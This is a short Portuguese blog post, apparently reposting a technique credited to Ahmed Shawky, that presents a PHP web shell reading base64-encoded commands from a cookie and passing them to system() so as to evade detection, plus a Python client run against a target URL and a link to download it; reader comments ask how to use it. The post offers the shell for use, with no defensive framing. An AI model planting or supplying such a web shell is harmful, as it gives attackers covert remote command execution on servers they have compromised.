O Script feito em PHP usa COOKIE uma variável global em vez de GET e POST em sua WebShell para ser mais furtivo.
Escrito por Ahmed Shawky @lnxg33k
O código a seguir é uma alternativa para os métodos GET e POST
como ele usa uma variável global _COOKIE.
Deve funcionar da seguinte forma:
![system(base64_decode($_COOKIE["1"]));](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTBZ5fMUhrJdQhYpPODTKSqDZ3gLrKi-ti06df0Lu9aciaIrCQWKJsdPXI9c4AhYseyc0Nu5K4vjSVMW6U-ftxUD2WAowFoaPedtLHi5pTW4CpP-uABZk0QTn9VwHpEYTWOjS9RvWycOk/s1600/Sem+t%C3%ADtulo.png "system(base64_decode($_COOKIE[\"1\"]));")
O código feito em Python, Explora isso abrindo um terminal para execução dos comandos desejados.
./cookie.py http://alvo.com.br/cookie.php
#BAIXAR https://github.com/lnxg33k/misc/blob/master/cookie.py
Amigo, qual é a regra que está a explorar ? sqlinjection ? não compreendi como posso usar o script em python.
ResponderExcluirObrigado cara :D
Pode passar mais informações de como usar ?
ResponderExcluirAbraços.
Este comentário foi removido por um administrador do blog.
ResponderExcluir